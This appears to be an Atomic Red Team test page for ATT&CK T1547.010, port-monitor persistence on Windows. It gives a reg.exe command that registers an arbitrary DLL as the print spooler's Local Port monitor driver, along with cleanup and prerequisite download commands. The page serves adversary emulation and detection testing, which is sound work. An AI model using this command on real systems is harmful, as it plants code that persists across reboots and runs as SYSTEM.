Try it using Invoke-Atomic

Port Monitors

Description from ATT&CK

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port
  • Standard TCP/IP Port
  • USB Monitor
  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

Atomic Tests

Atomic Test #1 - Change Windows Default Print Monitor

Register a malicious dll as a port monitor by changing the registry key. This can be used for persistence or privilege escalation.

Supported Platforms: windows

auto_generated_guid: 0778f116-a748-49c6-9633-122401744b26


Name Description Type Default Value
dll_payload DLL to inject Path PathToAtomicsFolder\T1547.010\src\x64\T1547.dll

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d #{dll_payload} /f

Cleanup Commands:

reg.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Local Port" /v Driver /t REG_SZ /d localspl.dll /f

Dependencies: Run with powershell!

Description: T1547.dll must exist on disk at specified location (#{dll_payload})

Check Prereq Commands:

if (Test-Path #{dll_payload}) {exit 0} else {exit 1}

Get Prereq Commands:

New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "" -OutFile "#{dll_payload}"